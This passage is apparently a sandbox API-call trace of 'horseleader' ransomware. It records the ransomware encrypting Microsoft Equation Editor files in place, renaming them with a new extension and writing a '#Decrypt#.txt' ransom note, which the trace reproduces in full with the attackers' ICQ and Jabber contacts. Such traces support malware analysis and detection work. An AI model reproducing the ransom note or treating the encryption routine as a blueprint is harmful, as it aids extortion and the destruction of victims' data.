lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0225.903] CloseHandle (hObject=0x1a4) returned 1 [0225.904] GetProcessHeap () returned 0x780000 [0225.904] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0225.904] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.horseleader") returned 87 [0225.904] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll.horseleader")) returned 1 [0225.905] GetProcessHeap () returned 0x780000 [0225.905] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0225.905] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60, dwReserved0=0x47646086, dwReserved1=0xc8731e9a, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 0 [0225.905] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0225.905] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\#Decrypt#.txt") returned 78 [0225.905] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0225.906] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0225.906] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0225.907] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0225.907] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0225.907] CloseHandle (hObject=0x158) returned 1 [0225.907] GetProcessHeap () returned 0x780000 [0225.907] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0225.907] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d107e00, ftCreationTime.dwHighDateTime=0x1bb541c, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5d107e00, ftLastWriteTime.dwHighDateTime=0x1bb541c, nFileSizeHigh=0x0, nFileSizeLow=0x9fd, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="EQNEDT32.CNT", cAlternateFileName="")) returned 1 [0225.907] lstrcmpiW (lpString1="EQNEDT32.CNT", lpString2="Windows") returned -1 [0225.907] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 72 [0225.907] StrStrIW (lpFirst="EQNEDT32.CNT", lpSrch=".horseleader") returned 0x0 [0225.907] lstrcmpW (lpString1="EQNEDT32.CNT", lpString2="#Decrypt#.txt") returned 1 [0225.908] lstrcmpW (lpString1="EQNEDT32.CNT", lpString2="_uninstalling_.png") returned 1 [0225.908] lstrlenW (lpString=".testttjffg") returned 11 [0225.908] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", lpSrch=".testttjffg") returned 0x0 [0225.908] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0225.908] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0225.908] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0225.962] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 72 [0225.962] StrStrW (lpFirst="EQNEDT32.CNT", lpSrch=".txt") returned 0x0 [0225.962] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2557) returned 1 [0225.962] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x9fd, lpOverlapped=0x0) returned 1 [0225.965] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff603, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.965] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x9fd, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x9fd, lpOverlapped=0x0) returned 1 [0225.965] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.965] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0225.965] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0225.965] CloseHandle (hObject=0x158) returned 1 [0225.965] GetProcessHeap () returned 0x780000 [0225.966] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0225.966] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.horseleader") returned 84 [0225.966] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt.horseleader")) returned 1 [0225.967] GetProcessHeap () returned 0x780000 [0225.967] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0225.967] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28305200, ftCreationTime.dwHighDateTime=0x1c2f1c2, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x28305200, ftLastWriteTime.dwHighDateTime=0x1c2f1c2, nFileSizeHigh=0x0, nFileSizeLow=0x84a48, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="EQNEDT32.EXE", cAlternateFileName="")) returned 1 [0225.967] lstrcmpiW (lpString1="EQNEDT32.EXE", lpString2="Windows") returned -1 [0225.967] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 72 [0225.967] StrStrIW (lpFirst="EQNEDT32.EXE", lpSrch=".horseleader") returned 0x0 [0225.967] lstrcmpW (lpString1="EQNEDT32.EXE", lpString2="#Decrypt#.txt") returned 1 [0225.967] lstrcmpW (lpString1="EQNEDT32.EXE", lpString2="_uninstalling_.png") returned 1 [0225.967] lstrlenW (lpString=".testttjffg") returned 11 [0225.967] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE", lpSrch=".testttjffg") returned 0x0 [0225.967] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0225.967] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0225.967] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0225.968] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE") returned 72 [0225.968] StrStrW (lpFirst="EQNEDT32.EXE", lpSrch=".txt") returned 0x0 [0225.968] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=543304) returned 1 [0225.968] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.968] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.970] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.971] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.972] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3fd24, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.972] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.974] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.974] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.974] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x7fa48, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.974] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.977] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.977] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.977] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.977] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0225.977] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0225.977] CloseHandle (hObject=0x158) returned 1 [0225.977] GetProcessHeap () returned 0x780000 [0225.978] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0225.978] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.horseleader") returned 84 [0225.978] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.horseleader")) returned 1 [0225.979] GetProcessHeap () returned 0x780000 [0225.979] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0225.979] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3acd3b00, ftCreationTime.dwHighDateTime=0x1c6cca0, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3acd3b00, ftLastWriteTime.dwHighDateTime=0x1c6cca0, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="eqnedt32.exe.manifest", cAlternateFileName="EQNEDT~1.MAN")) returned 1 [0225.979] lstrcmpiW (lpString1="eqnedt32.exe.manifest", lpString2="Windows") returned -1 [0225.979] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 81 [0225.979] StrStrIW (lpFirst="eqnedt32.exe.manifest", lpSrch=".horseleader") returned 0x0 [0225.979] lstrcmpW (lpString1="eqnedt32.exe.manifest", lpString2="#Decrypt#.txt") returned 1 [0225.979] lstrcmpW (lpString1="eqnedt32.exe.manifest", lpString2="_uninstalling_.png") returned 1 [0225.979] lstrlenW (lpString=".testttjffg") returned 11 [0225.979] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest", lpSrch=".testttjffg") returned 0x0 [0225.979] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0225.979] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0225.979] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0225.981] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest") returned 81 [0225.981] StrStrW (lpFirst="eqnedt32.exe.manifest", lpSrch=".txt") returned 0x0 [0225.981] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=566) returned 1 [0225.981] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x236, lpOverlapped=0x0) returned 1 [0225.982] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffdca, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.982] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x236, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x236, lpOverlapped=0x0) returned 1 [0225.982] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.983] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0225.983] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0225.983] CloseHandle (hObject=0x158) returned 1 [0225.983] GetProcessHeap () returned 0x780000 [0225.983] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0225.983] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.horseleader") returned 93 [0225.983] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\eqnedt32.exe.manifest.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe.manifest.horseleader")) returned 1 [0225.984] GetProcessHeap () returned 0x780000 [0225.984] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0225.984] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bd0200, ftCreationTime.dwHighDateTime=0x1be1298, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3bd0200, ftLastWriteTime.dwHighDateTime=0x1be1298, nFileSizeHigh=0x0, nFileSizeLow=0x2b0b7, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="EQNEDT32.HLP", cAlternateFileName="")) returned 1 [0225.984] lstrcmpiW (lpString1="EQNEDT32.HLP", lpString2="Windows") returned -1 [0225.984] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 72 [0225.985] StrStrIW (lpFirst="EQNEDT32.HLP", lpSrch=".horseleader") returned 0x0 [0225.985] lstrcmpW (lpString1="EQNEDT32.HLP", lpString2="#Decrypt#.txt") returned 1 [0225.985] lstrcmpW (lpString1="EQNEDT32.HLP", lpString2="_uninstalling_.png") returned 1 [0225.985] lstrlenW (lpString=".testttjffg") returned 11 [0225.985] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP", lpSrch=".testttjffg") returned 0x0 [0225.985] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0225.985] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0225.985] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0225.986] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 72 [0225.986] StrStrW (lpFirst="EQNEDT32.HLP", lpSrch=".txt") returned 0x0 [0225.986] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=176311) returned 1 [0225.986] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.986] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.989] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0225.989] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0225.989] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1305b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0225.989] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: 